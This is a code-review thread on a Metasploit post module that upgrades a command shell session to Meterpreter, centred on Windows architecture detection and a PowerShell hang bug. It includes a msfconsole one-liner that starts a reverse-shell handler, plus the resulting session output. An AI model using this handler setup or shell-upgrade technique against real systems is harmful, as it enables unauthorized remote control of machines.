modules/post/multi/manage/shell_to_meterpreter.rb

```diff
@@ -78,10 +78,17 @@ def run
     case session.platform
     when 'windows', 'win'
       platform = 'windows'
-      payload_name = 'windows/meterpreter/reverse_tcp'
       lplat = [Msf::Platform::Windows]
-      larch = [ARCH_X86]
-      psh_arch = 'x86'
+      arch = cmd_exec("wmic os get osarchitecture")
```

Comment:
Consider using `wmic_query` from the post API https://github.com/rapid7/metasploit-framework/blob/77ab9be4a6319b7755f1246c9ea009a1ea6eab6e/lib/msf/core/post/windows/wmic.rb#L38

Reply:
wmic_query looks like it requires a meterpreter session, whereas this module takes a shell session and gives a new meterpreter session.
I could update wmic_query to work with shell sessions but it seems unnecessary/convoluted for a 1 off command.

Reply:
Understood, there was a note in `wmic_query` about `dont use cmd_exec as WMIC cannot be Channelized`. Might at least offer some hints related to the possible tokenization issue mentioned in the description.

Reply:
Consider another technique 
```
reg Query "HKLM\Hardware\Description\System\CentralProcessor\0" | find /i "x86" > NUL && set OS=32BIT || set OS=64BIT
```
 Registry checks looks to be implemented for both `meterperter` and `shell` payloads in the post API
https://github.com/rapid7/metasploit-framework/blob/77ab9be4a6319b7755f1246c9ea009a1ea6eab6e/lib/msf/core/post/windows/registry.rb.

We use this technique for VMs [here](https://github.com/rapid7/metasploit-baseline-builder/blob/master/scripts/installs/vm-guest-tools.bat).

Reply:
I don't think it matters what command I run here, as the bug still occurs regardless. Even a simple cmd_exec('echo "64-bit"') still triggers the issue.
Additionally I can reproduce the issue on master if I attempt to upgrade the same shell session twice.

I suspect the underlying issue is that on shell sessions, cmd_exec('powershell ...') commands don't actually get executed unless you press enter (a few times), e.g:


```
msfconsole -qx "use exploit/multi/handler; set payload windows/shell_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/shell_reverse_tcp
lhost => 127.0.0.1
lport => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 127.0.0.1:4444
msf6 exploit(multi/handler) > [*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:52950 ) at 2021-11-22 03:16:43 +0000

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...


Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----


C:\Windows\system32>powershell "echo fail"
powershell "echo fail"
<-- we get stuck here until I press enter

fail






C:\Windows\system32>

C:\Windows\system32>echo. | powershell "echo works"
echo. | powershell "echo works"
works

C:\Windows\system32>


```


The have_powershell command works around this by appending an `echo. |`, so I've applied the same fix here:
https://github.com/rapid7/metasploit-framework/pull/15864/commits/423810ca5cfe9c75cd5fa93b8a0c6d7eed01082b